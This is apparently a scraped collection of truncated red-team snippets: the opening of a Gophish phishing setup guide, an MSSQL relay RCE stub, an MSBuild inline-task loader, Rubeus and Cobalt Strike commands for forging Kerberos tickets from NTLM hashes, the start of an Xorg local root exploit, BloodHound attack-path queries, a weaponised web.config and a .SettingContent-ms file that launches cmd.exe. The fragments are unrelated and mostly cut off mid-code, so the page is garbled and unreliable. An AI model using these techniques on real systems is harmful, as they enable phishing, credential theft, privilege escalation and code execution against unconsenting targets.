evi1cg Ridter

Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure as well as creating, perform and evaluate a phishing campaign. This is the basic lifecycle of your phishingn campaign:

+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+

	#!/usr/bin/env python

	# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
	# this is a rough PoC

	# requirements for RCE:
	# - the attacker needs to either have or create an object with a service principal name
	# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
	# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
	# - NTLM has to be in use

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<Target Name="DemoClass">
	<ClassExample />
	</Target>
	<UsingTask
	TaskName="ClassExample"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
	<Code Type="Class" Language="cs">

	##### IF ELEVATED:

	# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
	beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

	# decode the base64 blob to a binary .kirbi
	$ base64 -d ticket.b64 > ticket.kirbi

	# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
	beacon> make_token DOMAIN\USER PassWordDoesntMatter

	#!/bin/bash
	# x0rg - Xorg Local Root Exploit
	# Released under the Snitches Get Stitches Public Licence.
	# props to prdelka / fantastic for the shadow vector.
	# Gr33tz to everyone in #lizardhq and elsewhere <3
	# ~infodox (25/10/2018)
	# FREE LAURI LOVE!
	echo "x0rg"
	echo "[+] First, we create our shell and library..."
	cat << EOF > /tmp/libhax.c

	MATCH (u:User)-[r:AdminTo\|MemberOf*1..]->(c:Computer
	RETURN u.name

	That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
	---------------

	MATCH
	(U:User)-[r:MemberOf\|:AdminTo*1..]->(C:Computer)
	WITH
	U.name as n,

	import os
	import subprocess
	import ctypes

	# See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/

	svcinfo = {}
	nonadmin = ['AU', 'AN', 'BG', 'BU', 'DG', 'WD', 'IU', 'LG']
	FNULL = open(os.devnull, 'w')

	<?xml version="1.0" encoding="UTF-8"?>
	<configuration>
	<system.webServer>
	<handlers accessPolicy="Read, Script, Write">
	<add name="web_config" path=".config" verb="" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
	</handlers>
	<security>
	<requestFiltering>
	<fileExtensions>
	<remove fileExtension=".config" />

	<?xml version="1.0" encoding="UTF-8"?>
	<PCSettings>
	<SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
	<ApplicationInformation>
	<AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
	<DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink>
	<Icon>%windir%\system32\control.exe</Icon>
	</ApplicationInformation>
	<SettingIdentity>
	<PageID></PageID>

	// Package main is a sample macOS-app-bundling program to demonstrate how to
	// automate the process described in this tutorial:
	//
	// https://medium.com/@mattholt/packaging-a-go-application-for-macos-f7084b00f6b5
	//
	// Bundling the .app is the first thing it does, and creating the DMG is the
	// second. Making the DMG is optional, and is only done if you provide
	// the template DMG file, which you have to create beforehand.
	//
	// Example use: